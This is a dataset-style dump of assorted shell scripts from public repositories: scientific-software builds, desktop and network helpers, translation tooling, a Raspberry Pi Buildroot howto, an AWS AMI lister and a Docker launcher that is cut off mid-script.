blob_id
stringlengths 40
40
| language
stringclasses 1
value | repo_name
stringlengths 4
115
| path
stringlengths 2
970
| src_encoding
stringclasses 28
values | length_bytes
int64 31
5.38M
| score
float64 2.52
5.28
| int_score
int64 3
5
| detected_licenses
listlengths 0
161
| license_type
stringclasses 2
values | text
stringlengths 31
5.39M
| download_success
bool 1
class |
|---|---|---|---|---|---|---|---|---|---|---|---|
27fd54e101e002bfdc14929a0304c6fa6ba89ee7
|
Shell
|
noamross/shinyapps-package-dependencies
|
/packages/seasonal/install
|
UTF-8
| 619
| 2.75
| 3
|
[] |
no_license
|
#!/bin/bash
# Install the X-13ARIMA-SEATS binaries required by the R "seasonal" package.
set -x
set -e
# Fix: without pipefail a failed curl in the download pipelines below would
# be masked by tar's exit status.
set -o pipefail
apt-get -qq update
# The X-13 makefiles expect the legacy g77 compiler name; alias gfortran.
ln -s /usr/bin/gfortran /usr/bin/g77
mkdir -p /opt/x13as
# download & extract X-13ARIMA-SEATS
mkdir -p /tmp/x13assrc
mkdir -p /tmp/x13ashtmlsrc
# NOTE(review): -k disables TLS certificate verification -- confirm this is
# still needed for census.gov before keeping it.
curl -s -k https://www.census.gov/ts/x13as/unix/x13assrc.tar.gz | tar xzv -C /tmp/x13assrc
curl -s -k https://www.census.gov/ts/x13as/unix/x13ashtmlsrc.tar.gz | tar xzv -C /tmp/x13ashtmlsrc
# compile x13as
cd /tmp/x13assrc
make -f makefile.g77
cp x13as /opt/x13as
# compile x13asHTML
cd /tmp/x13ashtmlsrc
make -f makefile.g77
cp x13asHTML /opt/x13as
# configure R: tell the seasonal package where the x13as binaries live
echo X13_PATH = /opt/x13as >> /usr/lib/R/etc/Renviron.site
| true
|
2af2ce34434698781ed017165f8a2b5ff06b5146
|
Shell
|
stevearc/dotfiles
|
/.config/qtile/setup-monitors.sh
|
UTF-8
| 394
| 3.421875
| 3
|
[] |
no_license
|
#!/bin/bash
# Apply the saved screen layout that matches the number of connected
# monitors; skip if that layout was already applied (unless forced with -f).
set -e
# "\bconnected" does not match "disconnected" (no word boundary after "dis").
num_monitors=$(xrandr | grep "\bconnected" -c)
monitor_config="$HOME/.screenlayout/layout${num_monitors}.sh"
if [ -e "$monitor_config" ]; then
    if ! grep -q "$monitor_config" ~/.cache/qtile/last_layout 2>/dev/null || [ "$1" == "-f" ]; then
        echo "run $(basename "$monitor_config")"
        # Fix: ensure the cache directory exists before writing to it;
        # otherwise the redirection below fails on a fresh machine.
        mkdir -p ~/.cache/qtile
        echo -n "$monitor_config" >~/.cache/qtile/last_layout
        "$monitor_config"
    fi
fi
| true
|
846a8ac6a70ea9a91d9f59af658627b1362ea5a3
|
Shell
|
bjanderson70/misc
|
/getSID.sh
|
UTF-8
| 1,332
| 3.984375
| 4
|
[
"MIT"
] |
permissive
|
#!/bin/sh -x
#--------------------------------------------------------
# AUTHOR: Salesforce
# DESCRIPTION:
# This script pulls the user's session ID. It assumes
# the user properly set the 'sf_login.txt' information,
# which includes:
# <UID> : User Name
# <PWD+TOKEN> : Password + Security Token
#
# The results are saved in '.sf_results' file
#--------------------------------------------------------
#
# How to use the script
#
usage() {
[ "$1" ] && echo 1>&2 "Info: $1" ; echo 1>&2 \
'
usage: getSID <true|false>
OPTIONS:
true : is a Sandbox
false : is not a Sandbox
'
exit 2;
}
# A true/false argument is required.
[ "$1" ] || usage "is Sandbox is expected"
# The SOAP login request body must exist and be non-empty.
if [ ! -s sf_login.txt ]
then
echo " Missing the 'sf_login.txt' file"
exit 2;
fi
# Fix: "==" is a bashism that is not guaranteed under /bin/sh; use the
# POSIX "=" string comparison.
if test "$1" = 'true'; then
echo " Getting SID from a Sandbox... [results found in .sf_results]..."
curl -f -s -X POST https://test.salesforce.com/services/Soap/u/41.0 -H "Content-Type: text/xml; charset=UTF-8" -H "SOAPAction: login" -d @sf_login.txt > ./.sf_results
else
echo " Getting SID from Production... [results found in .sf_results]..."
curl -f -s -X POST https://login.salesforce.com/services/Soap/u/41.0 -H "Content-Type: text/xml; charset=UTF-8" -H "SOAPAction: login" -d @sf_login.txt > ./.sf_results
fi
# Propagate curl's exit status to the caller.
exit $?;
| true
|
00e8887777ab61d8d1119770876c35018d18b01e
|
Shell
|
mitchellolislagers/cell_type_enrichment_pipeline
|
/LDSC/bivariate_correlations/calculate_and_collect_rg.sh
|
UTF-8
| 3,168
| 3.03125
| 3
|
[] |
no_license
|
#!/bin/bash
# Fix: the original shebang was "#!bin/bash" (missing leading slash), which
# the kernel cannot resolve.
##Script to estimate genetic correlations among phenotypes
##Requirements: Munged sumstats
##By: Mitchell Olislagers
##Last updated: 10 Feb 2020
ldsc_dir=/hpc/hers_en/molislagers/LDSC/ldsc
sumstats_dir=/hpc/hers_en/molislagers/LDSC/summary_statistics
ref_dir=/hpc/hers_en/molislagers/LDSC/ref_data/regression
munged_dir=${sumstats_dir}/munged_sumstats
rg_dir=/hpc/hers_en/molislagers/LDSC/bivariate_correlations/analysis_phase3
rg_output_dir=/hpc/hers_en/molislagers/LDSC/bivariate_correlations/output_phase3
# NOTE(review): "conda activate" needs the conda shell hook sourced in
# non-interactive shells -- confirm this works in the target environment.
conda activate ldsc
cd ${munged_dir}
phenotypes=("ADHD" "AN" "anxiety" "ASD" "BIP" "cross" "MDD" "OCD" "PTSD" "SCZ" "TS" "alcohol_use" "alcohol_dependence" "drinks_pw" "cannabis" "smoking_initiation" "ever_smoked" "cigarettes_pd" "smoking_cessation" "ALS" "alzheimers" "all_epilepsy" "generalized" "focal" "all_stroke" "cardioembolic" "ischemic" "large_artery" "small_vessel" "parkinson" "height" "BMI" "chronotype" "daytime_sleepiness" "overall_sleep_duration" "short_sleep_duration" "long_sleep_duration" "insomnia" "intelligence" "educational_attainment" "cognitive_performance" "neuroticism")
phenotypes_munged=( "${phenotypes[@]/%/.sumstats.gz}" )
# Estimate rg of the first phenotype against all remaining ones, then drop
# it and repeat, so every pair is computed exactly once.
for phenotype in "${phenotypes_munged[@]}"; do
#Break the loop if only 1 variable in array
if [ "${#phenotypes_munged[@]}" -eq 1 ]; then
break
fi
#Join array by comma
rg_sumstats=$(printf ",%s" "${phenotypes_munged[@]}")
# Strip the leading comma. (The original wrapped this in an array to no
# effect: the joined string contains no whitespace, so it stayed a single
# word either way.)
rg_sumstats=${rg_sumstats:1}
#Run bivariate correlations
# $phenotypes expands to the first array element, so the output file is
# named after the current lead phenotype.
python ${ldsc_dir}/ldsc.py --rg $rg_sumstats --ref-ld-chr ${ref_dir}/1000G_EUR_Phase3_baseline/baseline. --w-ld-chr ${ref_dir}/1000G_Phase3_weights_hm3_no_MHC/weights.hm3_noMHC. --out ${rg_dir}/$phenotypes
#Remove first variable of array
phenotypes_munged=(${phenotypes_munged[@]:1})
phenotypes=(${phenotypes[@]:1})
done
python ${ldsc_dir}/ldsc.py --rg smoking_initiation.sumstats.gz,ever_smoked.sumstats.gz --ref-ld-chr ${ref_dir}/1000G_EUR_Phase3_baseline/baseline. --w-ld-chr ${ref_dir}/1000G_Phase3_weights_hm3_no_MHC/weights.hm3_noMHC. --out ${rg_dir}/test.log
cd ${rg_dir}
phenotypes=("ADHD" "AN" "anxiety" "ASD" "BIP" "cross" "MDD" "OCD" "PTSD" "SCZ" "TS" "alcohol_use" "alcohol_dependence" "drinks_pw" "cannabis" "smoking_initiation" "ever_smoked" "cigarettes_pd" "smoking_cessation" "ALS" "alzheimers" "all_epilepsy" "generalized" "focal" "all_stroke" "cardioembolic" "ischemic" "large_artery" "small_vessel" "parkinson" "height" "BMI" "chronotype" "daytime_sleepiness" "overall_sleep_duration" "short_sleep_duration" "long_sleep_duration" "insomnia" "intelligence" "educational_attainment" "cognitive_performance")
#Create header file ($phenotypes == first element, i.e. ADHD)
awk '/Summary/{y=1;next}y' ${phenotypes}.log > ${phenotypes}_no_top.log
head -n 1 ${phenotypes}_no_top.log > header_file.txt
rm ${phenotypes}_no_top.log
for phenotype in "${phenotypes[@]}"; do
#Only select summary of results
awk '/Summary/{y=1;next}y' ${phenotype}.log > ${phenotype}_no_top.log
sed -i -e "1d" ${phenotype}_no_top.log
head -n -3 ${phenotype}_no_top.log > ${phenotype}_no_top_no_bottom.log
#Append to header file
cat ${phenotype}_no_top_no_bottom.log >> header_file.txt
done
cp ${rg_dir}/header_file.txt ${rg_output_dir}/all_rg_phase3.log
| true
|
e0746d1cfaa32e4a840edca502cf9f1512221603
|
Shell
|
litvinenkonick/home
|
/.local/bin/network-startup
|
UTF-8
| 876
| 3.421875
| 3
|
[] |
no_license
|
#! /bin/bash
# Wait until a non-loopback network interface reports link, then launch the
# user's network-dependent applications in the background.

function command_exists () {
	command -v "$1" > /dev/null 2>&1;
}

# Interfaces whose name contains this substring are skipped when probing.
# Renamed from "local" (a confusing name: it shadows the builtin keyword).
# NOTE(review): a substring match also skips names like "wlo1" -- confirm
# that is intended.
skip_pattern='lo'
connection=0
while [ "$connection" -eq 0 ] ; do
	for interface in /sys/class/net/* ; do
		if [[ ! "$interface" == *"$skip_pattern"* ]]; then
			# Fix 1: reading carrier of a downed interface fails with
			# "Invalid argument", which left $connection empty and broke
			# the loop test; treat an unreadable carrier as "no link".
			# Fix 2: do not let a later link-less interface overwrite a
			# link already detected in this pass.
			if [ "$(cat "$interface/carrier" 2>/dev/null)" = "1" ]; then
				connection=1
			fi
		fi
	done
	sleep 0.5
done
if command_exists quiterss ; then
	echo "run quiterss"
	quiterss &
fi
if command_exists evolution ; then
	echo "run evolution"
	evolution &
fi
if command_exists discord ; then
	sleep 0.5
	echo "run discord"
	GDK_BACKEND=x11 discord &
fi
if command_exists wire-desktop ; then
	sleep 0.5
	echo "run wire-desktop"
	# NOTE(review): the check is for wire-desktop but the command launched
	# is wire-ozone -- confirm this mismatch is intentional.
	wire-ozone &
fi
# if command_exists signal-desktop ; then
# sleep 0.5
# echo "run signal-desktop"
# GDK_BACKEND=x11 signal-desktop &
# fi
# if command_exists slack ; then
# sleep 0.5
# echo "run slack"
# GDK_BACKEND=x11 slack &
# fi
| true
|
32f66545ced5c7780d0ba2e9cc9d42cdbfb60d38
|
Shell
|
ferhatgec/freebsd-doc
|
/tools/update_translate_template.sh
|
UTF-8
| 2,892
| 3.453125
| 3
|
[] |
no_license
|
#!/bin/sh
#
# Copyright (c) 2021 Danilo G. Baio <dbaio@FreeBSD.org>
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#
# 1. Redistributions of source code must retain the above copyright notice, this
# list of conditions and the following disclaimer.
#
# 2. Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions and the following disclaimer in the documentation
# and/or other materials provided with the distribution.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND
# ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
# WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
# DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
# FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
# DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
# SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
# CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
# OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
ALL_COMPONENTS="documentation
website"
# Component(s) to process; defaults to all of them.
COMPONENTS="${1:-$ALL_COMPONENTS}"
# Generated TOC files that must never end up in translation templates.
GIT_IGNORE_FILES="toc-examples.adoc
toc-figures.adoc
toc-tables.adoc
toc.adoc
toc-1.adoc
toc-2.adoc
toc-3.adoc
toc-4.adoc
toc-5.adoc"

# run_po4a <tool> <master.adoc> <po-file>
#   Invoke po4a-<tool> (updatepo or gettextize) with the option set shared
#   by every FreeBSD documentation template. Factored out of the previously
#   duplicated if/else branches.
run_po4a() {
	"po4a-$1" \
		--format asciidoc \
		--option compat=asciidoctor \
		--option yfm_keys=title,part,description \
		--master "$2" \
		--master-charset "UTF-8" \
		--copyright-holder "The FreeBSD Project" \
		--package-name "FreeBSD Documentation" \
		--po "$3"
}

# NOTE(review): generated TOCs are always pruned from documentation/, even
# when only "website" was requested -- confirm that is intended.
for remove_file in $GIT_IGNORE_FILES; do
	find documentation/content/en/ -name "$remove_file" -delete -print || exit 1
done
for component in $COMPONENTS; do
	if [ ! -d "$component/content/en" ]; then
		echo "Directory '$component/content/en' not found."
		exit 1
	fi
	# NOTE(review): word-splitting find output assumes no spaces in paths.
	for document in $(find "$component/content/en/" -name "*.adoc" ); do
		name=$(basename -s .adoc "$document")
		# Ignore some files
		if [ "$name" = "chapters-order" ]; then
			continue
		fi
		if [ "$document" = "documentation/content/en/books/books.adoc" ]; then
			continue
		fi
		dirbase=$(dirname "$document")
		echo "$document"
		if [ -f "$dirbase/$name.po" ]; then
			# Template exists: refresh it, then drop po4a's backup file
			# (rm -f is a no-op when the backup does not exist).
			run_po4a updatepo "$document" "$dirbase/$name.po"
			rm -f "$dirbase/$name.po~"
		else
			# First run for this document: create the template.
			run_po4a gettextize "$document" "$dirbase/$name.po"
		fi
	done
done
| true
|
b49b809b90c30b941df7633e9b4de98789da7157
|
Shell
|
zy1417548204/dialouge_motion_recognize
|
/go_run.sh
|
UTF-8
| 3,957
| 2.6875
| 3
|
[] |
no_license
|
#!/bin/bash
# NOTE(review): despite the bash shebang, the "!"- and "%"-prefixed lines
# below are Jupyter/IPython notebook cell commands (shell escapes and
# magics). This file will not run under plain bash as-is -- it appears to
# be an exported notebook; confirm how it is meant to be executed.
#----- Notes --------
# sed: ways to append content to a file
# 1. a  append after the matching line
# 2. i  insert before the matching line
# 3. r  append a file's contents after the matching line
# 4. w  write the matching line to the given file
#----- Notes --------
# Modify the config to use the pre-trained model
!cd /home/aistudio/work/ && sed -i '7c MODEL_PATH=./textcnn' run.sh
!cd /home/aistudio/work/ && sed -i 's#"model_type":.*$#"model_type":"textcnn_net",#' config.json
# Run inference and view the results
!cd /home/aistudio/work/ && sh run.sh infer
# Modify the config to select the cnn model
!cd /home/aistudio/work/ && sed -i 's#"model_type":.*$#"model_type":"cnn_net",#' config.json
!cd /home/aistudio/work/ && sed -i 's#"init_checkpoint":.*$#"init_checkpoint":"",#' config.json
# Change the directory where the trained model is saved
!cd /home/aistudio/work/ && sed -i '6c CKPT_PATH=./save_models/cnn' run.sh
# Train the model
!cd /home/aistudio/work/ && sh run.sh train
# Make sure the model in use is CNN
!cd /home/aistudio/work/ && sed -i 's#"model_type":.*$#"model_type":"cnn_net",#' config.json
# Use the cnn model trained just now
!cd /home/aistudio/work/ && sed -i '7c MODEL_PATH=./save_models/cnn/step_756' run.sh
# Evaluate the model
!cd /home/aistudio/work/ && sh run.sh eval
# View the data to be predicted
!cat /home/aistudio/data/data12605/data/infer.txt
# Use the cnn model trained just now
!cd /home/aistudio/work/ && sed -i 's#"model_type":.*$#"model_type":"cnn_net",#' config.json
!cd /home/aistudio/work/ && sed -i '7c MODEL_PATH=./save_models/cnn/step_756' run.sh
# Run model inference
!cd /home/aistudio/work/ && sh run.sh infer
# Switch the model to TextCNN
!cd /home/aistudio/work/ && sed -i 's#"model_type":.*$#"model_type":"textcnn_net",#' config.json
!cd /home/aistudio/work/ && sed -i 's#"init_checkpoint":.*$#"init_checkpoint":"",#' config.json
# Change the model save directory
!cd /home/aistudio/work/ && sed -i '6c CKPT_PATH=./save_models/textcnn' run.sh
# Train the model
!cd /home/aistudio/work/ && sh run.sh train
# Use the textcnn model trained above
!cd /home/aistudio/work/ && sed -i 's#"model_type":.*$#"model_type":"textcnn_net",#' config.json
!cd /home/aistudio/work/ && sed -i '7c MODEL_PATH=./save_models/textcnn/step_756' run.sh
# Evaluate the model
!cd /home/aistudio/work/ && sh run.sh eval
# Finetune based on the pre-trained TextCNN
!cd /home/aistudio/work/ && sed -i 's#"model_type":.*$#"model_type":"textcnn_net",#' config.json
# Use the pre-trained textcnn model
!cd /home/aistudio/work/ && sed -i 's#"init_checkpoint":.*$#"init_checkpoint":"./textcnn",#' config.json
# Change the learning rate and the model save directory
!cd /home/aistudio/work/ && sed -i 's#"lr":.*$#"lr":0.0001,#' config.json
!cd /home/aistudio/work/ && sed -i '6c CKPT_PATH=./save_models/textcnn_finetune' run.sh
# Train the model
!cd /home/aistudio/work/ && sh run.sh train
# Modify the config to use the model trained above
!cd /home/aistudio/work/ && sed -i 's#"model_type":.*$#"model_type":"textcnn_net",#' config.json
!cd /home/aistudio/work/ && sed -i '7c MODEL_PATH=./save_models/textcnn_finetune/step_756' run.sh
# Evaluate the model
!cd /home/aistudio/work/ && sh run.sh eval
# Finetune based on the ERNIE model
!cd /home/aistudio/work/ && mkdir -p pretrain_models/ernie
%cd /home/aistudio/work/pretrain_models/ernie
# Fetch the ernie pre-trained model
!wget --no-check-certificate https://baidu-nlp.bj.bcebos.com/ERNIE_stable-1.0.1.tar.gz -O ERNIE_stable-1.0.1.tar.gz
!tar -zxvf ERNIE_stable-1.0.1.tar.gz && rm ERNIE_stable-1.0.1.tar.gz
# Finetune training based on the ERNIE model
!cd /home/aistudio/work/ && sh run_ernie.sh train
# Evaluate the model
!cd /home/aistudio/work/ && sh run_ernie.sh eval
# Show all parameters and their descriptions
!cd /home/aistudio/work/ && python run_classifier.py -h
# Unpack the tokenizer package and tokenize the test data
!cd /home/aistudio/work/ && unzip -qo tokenizer.zip
!cd /home/aistudio/work/tokenizer && python tokenizer.py --test_data_dir test.txt.utf8 > new_query.txt
# View the tokenization results
!cd /home/aistudio/work/tokenizer && cat new_query.txt
| true
|
4a4437a59b1a36e2437de48db4615f46f6a1572d
|
Shell
|
swingywc/sshfs-bash
|
/get_mount_data.sh
|
UTF-8
| 653
| 3.921875
| 4
|
[] |
no_license
|
#!/bin/bash

# Look up the sshfs mount entry named $1 in the preset mounts file and
# populate the globals username/ipaddr/folderpath/targetpath from its
# whitespace-separated fields. Reports errors through mount_msg (defined
# elsewhere): 0fnf = file not found, 0dnf = mount entry not found.
get_mount_data() {
	# Preset your file directory
	file="/Users/wingchoy/sshfs.txt"
	isMountExist="false"
	# Missing mounts file -> error message
	[[ -f $file ]] || mount_msg 0fnf
	# Scan every record; the first field is the mount's name.
	while IFS='' read -r record; do
		fields=($record)
		if [[ $1 == ${fields[0]} ]]; then
			username="${fields[1]}"
			ipaddr="${fields[2]}"
			folderpath="${fields[3]}"
			targetpath="${fields[4]}"
			isMountExist="true"
		fi
	done <"$file"
	# Requested mount never matched -> error message
	[[ $isMountExist != "false" ]] || mount_msg 0dnf
}
| true
|
d54242982f5a1799369b66146dd307808c0f4bda
|
Shell
|
bluecatchbird/rpi-stuff
|
/createBuildrootImage.sh
|
UTF-8
| 3,900
| 3.171875
| 3
|
[] |
no_license
|
#!/bin/sh
# HOWTO: build a Raspberry Pi SD-card image with Buildroot.
# The commands below are meant to be copy-pasted step by step, hence the
# guard that exits immediately when executed as a script.
echo "do not run this howto as script!"
exit 0
BUILDROOT_VERSION=2015.02
BUILDROOT_NAME=buildroot-${BUILDROOT_VERSION}
BUILDROOT_FOLDER=build/${BUILDROOT_NAME}/
mkdir -p build download output mnt
# download buildroot
wget http://buildroot.net/downloads/${BUILDROOT_NAME}.tar.bz2 -P download/
tar xvfj download/${BUILDROOT_NAME}.tar.bz2 -C $(dirname $BUILDROOT_FOLDER)
# configure
make raspberrypi_defconfig -C $BUILDROOT_FOLDER
make menuconfig -C $BUILDROOT_FOLDER
make linux-menuconfig -C $BUILDROOT_FOLDER
# save own config
cp ${BUILDROOT_FOLDER}/.config my_raspberrypi_defconfig
# run buildroot
make -C $BUILDROOT_FOLDER
# special buildroot folder
ls -l $BUILDROOT_FOLDER/dl # downloades sources as tarballs, git and svn repos too
ls -l $BUILDROOT_FOLDER/output/build # extracted sources
ls -l $BUILDROOT_FOLDER/output/host # tools for host, compiler, lzop ....
ls -l $BUILDROOT_FOLDER/output/images # kernel, bootloader, firmware, devicetree, ramdisk ....
ls -l $BUILDROOT_FOLDER/output/staging # cross comiled libs for target
ls -l $BUILDROOT_FOLDER/output/target # rfs for target
################################################
# some buildroot cmds
## rebuild kernel
## $ make linux-rebuild -C $BUILDROOT_FOLDER
## clear all in output/ folder
## $ make clean -C $BUILDROOT_FOLDER
## clear all in output/ and dl/ folder
## $ make distclean -C $BUILDROOT_FOLDER
#################################################
# configure network
cat > ${BUILDROOT_FOLDER}/output/target/etc/network/interfaces << 'EOF'
# Configure Loopback
auto lo
iface lo inet loopback
# Configure eth0 with static IP
auto eth0
iface eth0 inet static
address 192.168.1.10
network 192.168.1.0
netmask 255.255.255.0
# Configure eth0 with dhcp IP
# auto eth0
# iface eth0 inet dhcp
EOF
# mount boot partition
echo '/dev/mmcblk0p1 /boot vfat defaults 0 0' >> ${BUILDROOT_FOLDER}/output/target/etc/fstab
# enable root shell on serial console
echo '/dev/ttyAMA0::respawn:/sbin/getty 115200 /dev/ttyAMA0 -n -l /sbin/sulogin' >> ${BUILDROOT_FOLDER}/output/target/etc/inittab
# rebuild rootfs.tar with modifications
make -C $BUILDROOT_FOLDER
# example usage of buildroot cross compiler
echo -en "#include <stdio.h>\nint main(){printf(\"Hello World\");}" | ${BUILDROOT_FOLDER}/output/host/usr/bin/arm-linux-gcc -o test.bin -xc -
# create inital image file
dd if=/dev/zero of=output/rpi.img bs=1M count=60
# create partitions
fdisk output/rpi.img << 'EOF'
n
+20M
t
c
n
t
2
83
p
w
EOF
# get partition from image to loopback
kpartx -as output/rpi.img
# write file systems
mkfs.vfat /dev/mapper/loop0p1
mkfs.ext2 /dev/mapper/loop0p2
# mount partitions
mkdir -p mnt/boot mnt/rfs
mount /dev/mapper/loop0p1 mnt/boot
mount /dev/mapper/loop0p2 mnt/rfs
# copy kernel and firmware to boot partition
# Fix: the original used ${BUILDROOT_DIR}, a variable that is never defined
# anywhere in this howto; the defined variable is ${BUILDROOT_FOLDER}.
cp ${BUILDROOT_FOLDER}/output/images/zImage mnt/boot/
cp ${BUILDROOT_FOLDER}/output/images/rpi-firmware/* mnt/boot/
# set kernel cmdline
## raspbian
echo "dwc_otg.lpm_enable=0 console=ttyAMA0,115200 console=tty1 root=/dev/mmcblk0p2 rootfstype=ext2 elevator=deadline rootwait" > mnt/boot/cmdline.txt
## flash boot
echo "dwc_otg.lpm_enable=0 console=ttyAMA0,115200 kgdboc=ttyAMA0,115200 console=tty1 elevator=deadline rootwait root=/dev/mmcblk0p2 rootfstype=ext4" > mnt/boot/cmdline.txt
## or nfsboot:
echo "dwc_otg.lpm_enable=0 console=ttyAMA0,115200 kgdboc=ttyAMA0,115200 console=tty1 elevator=deadline rootwait ip=::::rpi::dhcp root=/dev/nfs nfsroot=192.168.1.1:/mnt/shares/rpifs/nfsroot,tcp,rsize=32768,wsize=32768" > mnt/boot/cmdline.txt
## speed up boot time ( ~0.5s) by adding "quiet" to cmdline.txt
# extract rfs
# Fix: buildroot writes the tarball to output/images/rootfs.tar (see the
# folder listing above); the original path "image/rootfs.tar" does not exist.
tar xvf ${BUILDROOT_FOLDER}/output/images/rootfs.tar -C mnt/rfs
# free image
sync
umount mnt/boot
umount mnt/rfs
kpartx -d output/rpi.img
# flash image to sdcard
dd if=output/rpi.img of=/dev/sdX
| true
|
d7297fe4cd50f956878dca5bb0e483ced15faa07
|
Shell
|
Prosefionol/RPO
|
/libs/spdlog/build/compile.sh.bash
|
UTF-8
| 431
| 2.703125
| 3
|
[] |
no_license
|
#!/bin/bash
# Cross-compile spdlog for Android using the NDK's CMake toolchain file.
# Select exactly one target ABI below.
# NOTE(review): "armaebi-v7a" looks like a typo for "armeabi-v7a".
#ABI=armaebi-v7a
ABI=x86
#ABI=arm64-v8a
#ABI=x86_64
ANDROID_NDK=/home/ilyalinux/Android/Sdk/ndk/23.0.7123448
TOOL_CHAIN=${ANDROID_NDK}/build/cmake/android.toolchain.cmake
CMAKE=/home/ilyalinux/Android/Sdk/cmake/3.18.1/bin/cmake
mkdir -p "${ABI}"
# Fix: abort if the per-ABI build directory cannot be entered, so cmake
# never configures/builds in the wrong directory.
cd "${ABI}" || exit 1
${CMAKE} ../../spdlog -DCMAKE_SYSTEM_NAME=Android -DCMAKE_SYSTEM_VERSION=21 -DANDROID_ABI=${ABI} -DCMAKE_TOOLCHAIN_FILE=${TOOL_CHAIN}
${CMAKE} --build .
| true
|
355b0ebd9556b945ca9b0bca1ab976cdabaeddd4
|
Shell
|
nbcgo1/vpn-bastion
|
/scripts/get_amis.sh
|
UTF-8
| 719
| 3.734375
| 4
|
[] |
no_license
|
#!/bin/bash
# List ami ids of this images in all regions
# In a format for variable.tf
# Find latest names with get_latest_amis_names.sh
amiName="amzn-ami-hvm-2017.09.1.20180307-x86_64-gp2";
echo ""
echo " >>> Searching in all regions for for $amiName <<<"
echo ""
echo "# $amiName"
echo "variable \"amis\" {"
echo " type = \"map\""
echo " default = {"
# Region names contain no whitespace/glob characters, so the unquoted
# expansion is a safe way to iterate the list (modernized from backticks).
for i in $(aws ec2 describe-regions --region eu-west-2 --query 'Regions[*].{Name:RegionName}' --output text)
do
echo -n " \"$i\" = \""
output=$(aws ec2 describe-images --owners amazon --region "$i" \
--filters "Name=name,Values=$amiName" \
--query 'Images[*].{ID:ImageId}' --output text)
echo "$output\""
done
echo " }"
echo "}"
echo ""
| true
|
8431268367592f588b4b4257f1361e19d44a9abb
|
Shell
|
ftx-vmc/docker_container
|
/scripts/vmc_dc_start.sh
|
UTF-8
| 7,406
| 4.25
| 4
|
[] |
no_license
|
#!/usr/bin/env bash
# Start (or stop) the per-user VMC development Docker container.
# NOTE(review): SUPPORTED_ARCHS and USER_AGREED are never referenced in this
# script -- confirm they are used elsewhere before removing.
SUPPORTED_ARCHS=(x86_64 aarch64)
HOST_ARCH="$(uname -m)"
HOST_OS="$(uname -s)"
# Base "docker run" command; replaced with a GPU-enabled variant when a
# usable NVIDIA setup is detected (see determine_gpu_use_host).
DOCKER_RUN="docker run"
USE_GPU_HOST=0
USER_AGREED="no"
# Defaults, overridable via command-line options.
tag="latest"
SHM_SIZE="2G"
network="host"
# Absolute directory containing this script (helper scripts live next to it).
DIR="$( cd "$( dirname "${BASH_SOURCE[0]}" )" >/dev/null 2>&1 && pwd )"
# Print the command-line help for this script to stdout.
function show_usage() {
filename=$(basename $0)
cat <<EOF
Usage: $filename [options] ...
OPTIONS:
-h, --help Display this help and exit.
-i, --image <IMAGE> Docker image name.
-t, --tag <TAG> Specify docker image with tag <TAG> to start.
-n, --name <name> Container name.
--network <name> Default: host
--shm-size <bytes> Size of /dev/shm . Passed directly to "docker run"
stop Stop all running containers which belong to you.
EOF
}
# Print an error message with the "-E-" prefix, optionally print the usage
# help, and terminate the script with exit status 1.
#   $1 - message text
#   $2 - 1 to also print the usage help, anything else to skip it
function error()
{
    local _msg=$1
    local _do_help=$2
    echo -e "-E- $_msg"
    if [ "$_do_help" -eq 1 ]; then
        # Fix: the original called "do_help", which is not defined anywhere
        # in this script; the help printer defined above is show_usage.
        show_usage
    fi
    exit 1
}
# Emit a warning-level message on stdout with the "-W-" prefix.
#   $1 - message text
function warning()
{
    printf -- '-W- %s\n' "$1"
    return 0
}
# Emit an informational message on stdout with the "-I-" prefix.
#   $1 - message text
function info()
{
    printf -- '-I- %s\n' "$1"
    return 0
}
# Stop every container whose name matches "<current user>_*"; with
# -f/--force also remove the stopped containers.
#   $1 - optional "-f" or "--force"
function stop_all_containers_for_user() {
    local force="$1"
    local running_containers
    # "docker ps -a" also lists stopped containers, so already-stopped ones
    # are stopped again (a harmless no-op).
    running_containers="$(docker ps -a --format '{{.Names}}')"
    for container in ${running_containers[*]}; do
        # NOTE(review): the regex is unanchored, so "${USER}_" matching
        # anywhere in the name qualifies -- confirm prefix-only is intended.
        if [[ "${container}" =~ ${USER}_.* ]]; then
            #printf %-*s 70 "Now stop container: ${container} ..."
            #printf "\033[32m[DONE]\033[0m\n"
            #printf "\033[31m[FAILED]\033[0m\n"
            info "Now stop container ${container} ..."
            if docker stop "${container}" >/dev/null; then
                if [[ "${force}" == "-f" || "${force}" == "--force" ]]; then
                    docker rm -f "${container}" >/dev/null
                fi
                info "Done."
            else
                warning "Failed."
            fi
        fi
    done
    if [[ "${force}" == "-f" || "${force}" == "--force" ]]; then
        info "OK. Done stop and removal"
    else
        info "OK. Done stop."
    fi
}
# Abort with a usage error when option $1 is missing its argument ($2),
# i.e. when the argument is empty or itself looks like another option.
function _optarg_check_for_opt() {
    local flag="$1"
    local value="$2"
    if [[ -z "${value}" || "${value}" == -* ]]; then
        error "Missing argument for ${flag}. Exiting..." 1
        # Unreachable in practice: error() terminates the script itself.
        exit 2
    fi
}
# Parse the command-line options and store the results in the globals
# image_name, tag, container_name, network and SHM_SIZE. The bare "stop"
# command short-circuits: it stops/removes the user's containers and exits.
function parse_arguments() {
    shm_size=""
    while [ $# -gt 0 ]; do
        local opt="$1"
        shift
        case "${opt}" in
            -i | --image)
                image_name="$1"
                shift
                _optarg_check_for_opt "${opt}" "${image_name}"
                ;;
            -t | --tag)
                tag="$1"
                shift
                _optarg_check_for_opt "${opt}" "${tag}"
                ;;
            -h | --help)
                show_usage
                exit 1
                ;;
            -n | --name)
                container_name="$1"
                shift
                _optarg_check_for_opt "${opt}" "${container_name}"
                ;;
            --shm-size)
                shm_size="$1"
                shift
